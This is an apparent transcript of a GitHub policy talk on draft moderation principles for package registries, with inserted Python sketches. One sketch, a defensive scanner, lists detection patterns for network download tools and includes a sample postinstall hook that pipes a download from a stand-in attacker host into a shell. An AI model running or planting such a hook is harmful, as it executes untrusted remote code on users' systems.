Hi, everybody, and welcome to our talk. We're two members of the GitHub policy team, and we've been thinking pretty hard about what role policy can play in building a more secure supply chain. I'm Justin Colannino. I'm a director of developer policy at GitHub, and I'm also a lawyer at Microsoft, so I wear multiple hats in different places. Hi, I'm Margaret Tucker. I'm a platform policy analyst at GitHub. To start off, we'll talk a little bit about platform policy. At GitHub, we're really centered around developers in how we do content moderation. Compared to other social media or general-purpose platforms, we have a very different type of content, and our users, developers, maintainers, and companies are crucial to how content moderation works on our platform. With that, we've developed content moderation standards and practices that center the developer. These are our three driving approaches to content moderation: putting the developer at the center of our approach, making fair, empathetic, and transparent moderation decisions, and optimizing for code collaboration, so that if moderation does need to happen, it does so in the least disruptive way possible. In thinking about package registries, we've been asking how we can apply that same developer-first ethos for content moderation to package ecosystems. This really came to a head as GitHub acquired npm; on the Microsoft side, we were able to do some advising of NuGet; and there are other package registries out there. We were thinking: what are the right principles to put in place so that the developer, the user, the maintainer, and the registry are on equal footing?
What is the dance we should be doing to make sure we're optimizing for the right outcomes for all three of these constituencies as we move forward? Yeah. And there's a reason we can't just copy and paste the GitHub policies onto npm or any package registry: they have unique features and concerns. While package registries are crucial to the development of an open source commons, to innovation, all the good stuff, they also introduce new vectors of attack or decay, because they serve code in flight instead of code at rest. That means they can be used to spread malware, break ecosystems, a lot of negative things. So we want to apply this ethos to that unique environment. Yeah. Well, I just want to loop on that: code at rest versus code in flight. I think many people in the audience might get that from a lawyer perspective, which I like to apply to a lot of what I do, since I'm a lawyer. There's actually case law on this very point. Some people might remember the DeCSS case, Universal City Studios v. Corley, an appellate court case about whether it violated free speech principles to stop the distribution of a key that could be used to decrypt DVDs. The question was: could you stop somebody from sharing code that could decrypt DVDs, or sharing the code for doing that? The case held that both object code and source code, code in flight and code at rest, were subject to First Amendment principles, but that source code had more value to society as a method of speech than object code, or code in flight, in that case.
And the reason for that is that with the push of a button, without even reading the code or looking at how it operates, you can actually perform the function. So the functionality of the thing is the difference between code at rest and code in flight. Go ahead, Ava. No, I think it was all C. So that's right. Now, some package registries, of course, PyPI for example, serve an interpreted language, and so much of the code in there is going to be readable. So maybe that's different. Maybe it's the fact that it's pulled in a format where you press a button and it deploys, which is slightly different than if it's sitting in a .py file somewhere. So maybe that's one example where it wouldn't necessarily hold. But anyway, I just wanted to loop on that for a minute, to illustrate the difference. The fact that you can push a button and it goes everywhere and it runs makes it a lot different than code at rest that people can read, download, and collaborate on, on GitHub. Yeah, it's like: code is different than other content, and code in flight is different than regular code. Right. All right, let's move on. So, Justin, you want to take those? Sure. So then the question is, recognizing that difference, and we hope you'll all have input on whether we got the balance right between those three constituents: what's the difference between when a user publishes something that they know is malware, versus just some known security vulnerability in a package? Because all code has bugs, right? I mean, maybe there are some things that don't.
Maybe people are very certain that there's one package out there without bugs. But as a general principle, developers are going to put bugs into code, and it's an iterative process to remove them. So then the question is: if we know something is a security vulnerability, should we be taking it down? Or should it only be in the malware case? What principle should be used to sniff out when we pull things off and when we don't? That's what we're trying to answer today. I want to emphasize that I actually think there are broader questions we could be asking, and broader collaborations between all these ecosystems and their constituents, the maintainers and the end users; maybe those can be the same people, but they come at it from different perspectives, depending on how they're framed. Around other parts of the security space, around things like code signing principles. You could imagine something also about license compliance, putting my open source law hat on for a minute. Principles around whether the source code needs to be transparent, whether there should be reproducible builds or something close to that built into the registry tooling. All those things are possible and things we could be talking about as we think about this. But here we're really looking at those two different cases, and the principles we're going to throw out there for comment and discussion are really trying to drive at that.
The way we thought about this, and we've talked about it a little already, is that there's a balance between the registry's responsibility to its users and to the broader ecosystem it's serving: you want a consistent, reliable, safe environment to develop code in. If you're yanking something off, or if there's malware on there, people still want to be able to depend on that package registry when they're building code. The registry has the ability to break builds, and people don't want that happening without real reason. Then on the other side, you have the maintainers. They're putting a lot of creativity, gumption, and effort into building code that everybody depends on, that's interdependent with one another, and they're the ones who are really maintaining the safety of the broader ecosystem. So we need to figure out the right balance for fostering that creativity while driving reliability. Yeah, let's pivot into the principles themselves. We offer these, and then we'll get into the specifics. These are very much draft principles; we want to get all of your feedback. These are not settled principles whatsoever. Essentially, they build off how GitHub has built its own content moderation policies, which has meant working with the Santa Clara Principles, human rights frameworks, and other platforms we collaborate with, hearing what's in the ecosystem, and then thinking about how you can take overarching principles and operationalize them into actual content moderation decisions. So these are our five, and I guess we can just move into the first one. First: trust comes first. This one's you, yeah. Sure, I'll take it.
So again, like we talked about, in order for these things to work, people need to trust each other. The end user of the registry needs to trust that the maintainers are doing the right thing, and they also need to trust that the platform is behaving responsibly and isn't going to break their builds needlessly, things like that. The overarching concern, the number one thing, is that everything should be consistent, reliable, and build trust between those constituents. Part of the role the registry plays here is to provide tools so people can understand what they're depending on. When you pull in package one and it depends on five other things, or 2,000 other things, you should be able to know and trace what those things are, so you can get some kind of reliable snapshot of the whole chain you're relying on. And again, in any moderation decision at the platform level, you're trying to avoid breaking any of the developers who depend on that package, unless there's something seriously wrong and seriously vulnerable out there. Part of that path of discovering things, and we'll get into it a little bit, is so that you can know about vulnerabilities and do your own testing on them. All right, our next one. This is what I think the whole thing hinges on: we need clear roles and responsibilities for the registry, the maintainer, and the user. A crucial part of that is having transparent and consistent policies, so there's a clear expectation of what the role of the registry is and what the role of the maintainer is.
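To make that dependency-transparency point concrete, here is a minimal sketch of tracing everything a single install actually pulls in. The in-memory index, the package names, and the `transitive_deps` helper are all hypothetical, a toy model rather than any real registry's API:

```python
# Sketch: flatten a package's transitive dependencies so a user can
# see everything one install actually pulls in. The "index" below is
# a hypothetical in-memory stand-in for registry dependency metadata.

def transitive_deps(package, index, seen=None):
    """Return the full set of packages reachable from `package`."""
    if seen is None:
        seen = set()
    for dep in index.get(package, []):
        if dep not in seen:
            seen.add(dep)
            transitive_deps(dep, index, seen)
    return seen

# Toy index: installing "app" directly names only two dependencies...
index = {
    "app": ["http-lib", "json-lib"],
    "http-lib": ["tls-lib", "url-lib"],
    "json-lib": [],
    "tls-lib": [],
    "url-lib": ["idn-lib"],
    "idn-lib": [],
}

# ...but the resolved install is larger, which is exactly what
# registry transparency tooling should surface to the user.
print(sorted(transitive_deps("app", index)))
```

In a real ecosystem this is what lockfiles and dependency-graph features provide: a reliable snapshot of the full chain, not just the top-level names.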
When we operationalize that, talking about malware versus bugs is just the start of understanding where do you end and where do I begin, and how these responsibilities are shared. And obviously, having transparent rules for the ecosystem, how they're enforced, and how to appeal is a crucial part of having trust in any platform. Especially with code in flight, there's an expectation that things will continue to be available, so if they're taken down, there needs to be a clear understanding of why, and whether there's an opportunity for redress. Having those policies consistently applied across the registry is also very important. I kind of think of that first bullet, the clear roles and responsibilities, as the baseball problem. Or the soccer problem, whatever you like. Security is a global team sport, and if there's a ball up in the air, you want to know whose job it is to catch it. On a fly ball in baseball, somebody says, "I got it," right? So knowing whether something is the registry's responsibility to go after, or the maintainer's, or the user's to uncover, that's really helpful when you're asking: should this have been taken down by the registry? Who's at fault, who's at play? Let's drive that kind of clarity and process as we play this global team sport of security. Yeah, and I should say, with these principles we're not trying to prescribe anything. It's a level of abstraction: we want transparent and consistent roles, and then we ask how we can actually have that given how package registries really function. Next: secure the supply chain. From the registry's perspective, I kind of think of this as "no malware," right?
Malware is something that just shouldn't be on there; registries should work hard to snuff it out. The registry really should have an obligation to take proactive measures and build tools that detect that malware. Part of that is looking at what the maintainer might be saying about the package they're putting out there. They could be saying, hey, I've introduced this thing; or it might be really clear that a recent takeover of maintainership has driven it, or that the keys might have been hacked. So that's on the one side. But then there's also giving developers the tools to identify security vulnerabilities that don't rise to the level of malware. That would be another important piece of the focus on security under this principle. All right, our next one: maintainers should be empowered to be maintainers. I think this gets a little into the prescription that registries should view themselves as infrastructure and take on that kind of role: not being involved in day-to-day package maintenance issues, but really stewarding the overall registry as an ecosystem. Key parts of this are assuming the positive intent of maintainers, enabling them to easily comply with registry policies, and, getting back to tooling, giving them the tools and education so they can do that. And then, going back to our previous points, when registries do need to take enforcement action, they should apply measures carefully. What does "carefully" really mean? I think what we're trying to say is: take into account context, dependencies, and the broader ecosystem when you're taking any sort of enforcement action.
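As one illustration of the kind of proactive detection tooling a registry might build, here is a toy heuristic that flags packages whose install hooks shell out to the network. The manifest shape loosely mimics an npm package.json, but the pattern list and the `flag_install_scripts` function are illustrative assumptions, nothing like a production scanner:

```python
# Toy publish-time check: flag install hooks that download and run
# remote code. Real malware detection is far more involved; this only
# illustrates the idea of proactive, registry-side scanning.

SUSPICIOUS_PATTERNS = ("curl ", "wget ", "| sh", "base64 -d")

def flag_install_scripts(manifest):
    """Return (hook, reason) pairs that deserve human review."""
    findings = []
    for hook in ("preinstall", "install", "postinstall"):
        script = manifest.get("scripts", {}).get(hook, "")
        for pattern in SUSPICIOUS_PATTERNS:
            if pattern in script:
                findings.append((hook, f"script contains {pattern!r}"))
    return findings

# Hypothetical manifest whose postinstall pipes a download into a shell.
manifest = {
    "name": "left-padder",
    "scripts": {"postinstall": "curl http://evil.example/x | sh"},
}
print(flag_install_scripts(manifest))
```

A flagged package would go to human review rather than automatic takedown, which keeps the "apply measures carefully" principle intact.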
And just to tack on about those day-to-day package maintenance issues: what makes these things so rich is the variety of people from all over the world who are maintaining packages and putting them up so that everything can interoperate, a one-stop shop to pull from in a development environment or as a dependency. If the registry takes over too much of that, then that richness starts to break. So it's really important, as part of this dance between the registry, the user, and the maintainer, to figure out the right balance so we can continue to have this large amount of innovation and ecosystem growth, but at the same time figure out the right roles for driving security best practices. All right, this is our final bullet, and then we're going to break into workshopping these principles and getting your feedback and experiences. Running through all of this is: always innovate, and that means both tools and the policies themselves. Just as risk and vulnerabilities in the supply chain are continually evolving, so should the registries themselves be evolving, both taking advantage of existing tools for moderation, privacy, and security, and continually updating best practices. What we're really hoping with these principles is to start a discussion between not just npm, PyPI, and NuGet, but the whole broader ecosystem, bringing everyone in, bringing Rust and RubyGems in. Everyone who's involved and who is a stakeholder shares their best practices and builds off each other. And finally, with that, these draft principles are a living document.
If they do become something that is used by registries, they would be treated as a living document and should change both with the ecosystem and with input from the community. And, you know, we're not security experts, right? Not by any means; I've already introduced myself as policy and law. But the goal here is, by stepping back, to ask: what are the rights and responsibilities of the parties? That's kind of a legal question. What are the rights and responsibilities, and what ought they be between us? What should we all agree on as a social contract? And then get down to the lower level of how we implement that in a way that works for everybody and keeps everybody safe. That's really what this exercise is trying to drive. Yeah, go ahead, Ava. I haven't seen that the responsibilities really should be different. I think there might be a difference in resourcing, which would drive differences in the actual implementation. But that's a good question that I'd love feedback on as we're sharing these policies. Is this too much to aspire to for something that's community managed? If you're standing up a registry that is community managed and you don't have a lot of resources, what's the right way to go about getting those resources from the many people that have dependencies on you? So, moving into why we need this. I would love to hear your feedback on whether you think this is a useful framework and how you think it could be operationalized. What we're imagining is similar to the Santa Clara Principles or other kinds of platform moderation frameworks.
This isn't necessarily prescriptive, but it creates a common dialogue and a common conversation that can enable larger registries to share resources and best practices. Also increasing trust in packages. Oh my gosh. Okay, I think we might have, wow, okay. Well, we can just move into it. Yeah, having increased trust and shared principles means that when incidents do happen, there's at least a baseline of expectations and principles that drive the response. Maybe I should have asked you this question earlier, Margaret. What are the Santa Clara Principles? Not what are they exactly, but what purpose do they serve and where do they come from? Yeah, the Santa Clara Principles are specific to platform regulation, but they're an agreed-upon set of principles that GitHub has signed on to that guide, generally, how platforms should moderate online. It's more of a rights-based, pro-speech framework than anything really specific that gets down to the nitty-gritty. But I think it creates a common expectation, so when you're working with other platforms that might have a similar perspective on how moderation should work, you can share those best practices within the framework of the principles. And this is a similar idea, but for driving that in a more specific context that, again, is different. Facebook is different than GitHub, and registries are different than GitHub too, just on a different part of the spectrum. Yeah, but I would argue that while principles and really abstract things can be lofty, they can create this common dialogue. So, enough from us. Let's workshop these principles. Should we go back to the slide with the five? Sure, that works. And if anyone has comments or questions, that's really why we're here. Yeah, go ahead, Justin.
I think that's right. I wasn't involved in those decisions, but the way I've thought about this, from my role at Microsoft and other places, is that anything that breaks people's software is not something you want to permit. Maybe there's a spectrum, right? Something that goes in and starts deleting people's files, that's malicious toward the execution environment the software is running in: that's one end of the spectrum. Then you could move down to where it's just showing the user a message, maybe every time the software starts up; move down further and it shows that message one time only; and then further still, it doesn't show anything to the end user at all, it only shows something to the developer who's using that package in a development environment and never actually reaches the end user of the software. So the scale is different. And then, I don't know, maybe it's just on a web page somewhere, or in the readme on the registry's web page, that just says: this is what I think. That would be the spectrum, and the question is where you want to draw the line. I don't know exactly where GitHub's drawn that line, but I think it's an important thought exercise to put things on that spectrum and then say: where might we want to draw the line? Yeah, and I'll just say again, I wasn't involved, but when we were talking about how we would present this and give case studies, something we kept coming back to with the protestware incidents is that there were different decisions depending on what the specific incident was.
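That severity spectrum could be modeled roughly like this. The level names and the takedown threshold are purely illustrative assumptions for the thought exercise, not GitHub or npm policy:

```python
# A sketch of the severity spectrum just described, ordered from
# registry-page-only messaging up to malicious behavior in the end
# user's execution environment. Levels and threshold are illustrative.

from enum import IntEnum

class Severity(IntEnum):
    README_ONLY = 0          # statement only on the registry web page
    DEV_MESSAGE = 1          # shown to the developer at install time
    USER_MESSAGE_ONCE = 2    # shown once to the end user
    USER_MESSAGE_ALWAYS = 3  # shown on every startup
    MALICIOUS = 4            # deletes files / attacks the environment

# One possible place to draw the line: intervene only once behavior
# reaches the end user of the shipped software.
TAKEDOWN_THRESHOLD = Severity.USER_MESSAGE_ONCE

def registry_should_intervene(severity):
    return severity >= TAKEDOWN_THRESHOLD

print(registry_should_intervene(Severity.DEV_MESSAGE))  # False
print(registry_should_intervene(Severity.MALICIOUS))    # True
```

The value of the model is less the specific threshold than forcing an explicit, consistent answer for every point on the spectrum.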
So that's why we're saying this is not prescriptive in any way: the context is very specific and depends on a lot of other things, but hopefully we'll have an overarching principle, plus registries sharing decisions with each other. So in the future, if this continues to be something that occurs, and I could totally see it happening in another incident, then we'll have a baseline of expectations to fall back on. Yuba. I do see a question in the back. Yeah, I love that question. The way we've been thinking about this is that there might be vulnerabilities that are context specific and known, and they're flagged, so they should probably be surfaced in some way to the developer who's using the package. Then the question is: if the developer doesn't want to migrate off it, is it the platform's responsibility to do something or not? If it's known, tooled, exposed, and transparent, is that okay? Now, it's one thing if it's malware; that might be different. But if the upstream developer doesn't want to fix it, or they fixed it in a later version but that had some other impact on functionality so the developer doesn't want to pull the fix, is that okay? My inclination is to say yes, as long as everybody knows, but if people feel differently, I'd love to hear it. Yes. I don't know if I can do that question justice. Let me just try. That was a good question. Yeah. Oh, thank you for bringing a mic around. For the benefit of the audience, the question was basically: if there's a known vulnerability and you're running a package registry, how long should you allow people to continue to download and use the vulnerable version, instead of blocking them at some point?
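The "surface it, don't block it" approach described a moment ago could be sketched like this. The advisory format, the package names, and the `audit` helper are all hypothetical stand-ins for real advisory databases and audit tools:

```python
# Sketch: warn about pinned versions with known advisories, but leave
# the migration decision to the developer. The advisory data is a toy
# placeholder, not a real vulnerability feed.

ADVISORIES = {
    ("http-lib", "1.2.0"): "example advisory: header injection (fixed in 1.2.1)",
}

def audit(lockfile):
    """Return warnings for pinned versions with known advisories."""
    return [
        f"{name}=={version}: {ADVISORIES[(name, version)]}"
        for name, version in lockfile.items()
        if (name, version) in ADVISORIES
    ]

# Hypothetical project pins: one vulnerable, one clean.
lockfile = {"http-lib": "1.2.0", "json-lib": "2.0.0"}
for warning in audit(lockfile):
    print("WARNING:", warning)  # surfaced; the download still works
```

The design choice being illustrated: the registry's job here is transparency, while the takedown question only arises once something crosses into malware.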
Should you have some time expiration? And the response, well, you heard the response. Go ahead, Ava. Setting aside research reasons, it really does raise a question. Pivot from that to: do we see the registry as a neutral intermediary for speech, much like we do on the platforms? We brought up Facebook, okay. Publishing platforms versus mediums through which content is merely transmitted, where the liability falls back on the platform differently. How does that change things? It seems like you're suggesting it does change, but not clearly drawing a line of where you think it does. So, to try to do justice to the question: what I heard was this idea that there are some free speech principles out here, and maybe things are context specific, but how would you draw the line between something on the malware side of the fence versus a known security vulnerability where the maintainer is kind of like, eh, won't fix? Right, and to elaborate on that: how should the package registry think of itself? Should it think of itself as the curator of these things, or as a common carrier? I think it's more of a common carrier, based on what we've put up here: this idea that we're a throughput to allow the ecosystem to flourish and almost moderate itself in terms of known vulnerabilities, et cetera. It's only in these very obvious and malicious areas, where something is causing chaos for developers because it's unexpected malware, that we might want to pull things back. Yeah, good question. I think you hinted at this earlier: some registries are public, and there's some expectation that they're a public forum. A corporate registry is the opposite. There is an expectation that you have very good guardrails.
So there actually is a different expectation of very strong security, and an understanding that you will be told: no, we don't need this, we don't even want it. And there's a very confusing in-between: an app store, which looks public but is definitely a corporate environment, or maybe something like Debian or Fedora, which has strong guidelines but also an acceptance step. So, yeah. Right, yeah. And maybe it's consent, as someone mentioned. Maybe that's a way to phrase it: the registry just needs to strongly state its expectations. I don't know. Now that you've brought up Debian and Fedora, in my own thinking about these things I've treated Debian and Fedora as system package registries, where you build a system rather than build other software on top, as opposed to what I think of as development registries, which is what we're talking about here. And I think we're really focused on the public registry space in this conversation. I completely agree with you that a corporate internal registry should have a lot less tolerance for a lot of the stuff we're describing here. Those decisions should be made at a system level, and those guardrails generally should be a lot tighter, unless it's really impacting the developer experience inside the organization. I think this echoes what some of the previous questioners were saying, but this comparison of public registries with speech platforms is really interesting.
And that got me thinking about the way people may search with different filters or have default available results, especially when it comes to the availability of malicious packages and how long you want to keep them around. Obviously, they're interesting for some people to have, but the average user probably doesn't want to expose themselves to malicious packages on download. So it may be that, in order for a package registry to also be trustworthy in the sense of not blocking content from certain users, it always delivers a rationale, a reasoning, for why something might be filtered by a default policy, whereas users who want to can expose themselves to more experimental or malicious code. I like that. You could almost imagine it being similar to the bleeding-edge repositories in Debian or Fedora versus the stable branch. Those registries? Yes. One thing I want to highlight here, which was kind of mentioned before with the public versus corporate registries, is that we're not really stating what the incentives of the registry are. When it comes to things like what Docker did a few years back, literally selling access to stuff that was not made by them: are we going to do that here? What incentives are we stating? I would also say that's very relevant to security, to things like data ownership. If a vulnerability is announced, the registry actually knows how many downloads the vulnerable version has, how many of them are unique, where they are, even the companies that are involved. But the maintainers don't have access to that.
And it's not because they're not asking for these things; they just don't have them. So I would be really keenly interested in where we land on those issues. But if we're not talking about the actual goal, about why GitHub wants to have a registry, it's hard to talk about it. And so, yeah. No, I like that. So, just to make sure I'm taking that feedback in: depending on the registry, knowing where things go and sharing that with maintainers might help maintainers make good choices around will fix, won't fix, why, when, priorities, et cetera. Is that a good summary? Is there something else? So, on the transparency part of it, just for the benefit of people, because the microphone moved on: on the transparency piece, there should also be a stated goal and description of the relationship between the maintainer, the user, and the registry, and that's important. We've definitely tried to bake some of that in, but I think that explicit comment about making those things clear is very apt. So thank you. Yeah, I just want to say, on the platform side, in articulating to policymakers how GitHub functions and what our platform policies are, we always talk about how our business functions, because it's so different from Facebook or Twitter. Everything that drives how our platform functions is different: we're not selling user data, we don't have advertising on the platform. So I think you raised an important question. Another question that I have for people who might be more informed: do different registries have different incentives? Anyway. Yes.
So, partially to answer your question, and to ask my earlier question about the difference between corporate-owned or corporate-managed registries, and I don't mean private, I mean public, versus community-managed ones: the incentive, right? Who is operating it, and for whom is it being operated? In my experience these really vary into two large camps: those that are run by a community for themselves, and those that are run by, or heavily sponsored by, a company for some other reason. I think that was your point as well, which gets to the question I was going to ask. Going back to deleting malware: we have also had situations where maintainers deleted their own packages and caused breakage downstream. So there's precedent that says, "Maintainer, we shall delete your thing if we think it's bad," and also, "Maintainer, you may not delete your thing if we think deleting it is bad." That already speaks to consent. How could you model the maintainer's ownership of, or rights in, a package when it is being transmitted or stored through a registry? What is the relationship of consent and ownership of content that the registry has? And I think this is where community versus company seems to have differed over the past four or five years, at least in the cases I've seen, though I certainly haven't seen all of them. So how has that been different? That's my question. Has it been that the community-run registries are more likely to say, "Yes, you can yank this and then nobody can use it," while the corporate ones have said no? You're the maintainers themselves. Yep. Okay. I think my question back is: what's better for the consistency and reliability of the platform? Because that yanking is causing chaos for the end user. Is the goal that the end user have a consistent, reliable experience when using the registry, or should we be optimizing for something else?
There might be good reasons to yank something, and maybe what you need is a list of those reasons and transparency around when you can yank something as a maintainer and when you shouldn't be permitted to, so that everybody, user, maintainer, and platform, agrees on that social contract. Yes. What responsibility do you think registries have to adhere to the laws and regulations of the various countries of the world when the community is worldwide? How would you handle situations where there are completely different regulations across arbitrary borders? That is a hard question. That's the question. You need to follow laws if you're operating in a place. The question is whether serving something from where you are is necessarily operating in a place, and what ability people have to come after you through their own legal systems. So the answer is: you want to be as consistent as possible worldwide, and you want to maintain availability worldwide. But then there are questions of blocking and other issues that come into play. You want to keep it as worldwide as possible; I think that's the responsibility you're trying to drive at, right? But in some cases it's very difficult to do that. Oh, wait, hold on, just one thing. I think it's great to look at how platforms operate here, because they have these overarching principles, and those are usually how they respond to very specific laws. If you have a framework that generally responds to these ideas, then it can make the compliance side of things easier to handle. And security is much more in the minds of policymakers right now than it has been before.
So I think it's very possible that we could see more specific regulatory efforts when it comes to things like this. And I think everybody should be participating in the places where they feel comfortable; that's the way I think about it. Are we at time? Yeah, we're at time. Okay. Thank you all so much. We really appreciate it. Great conversation, everybody. Thank you.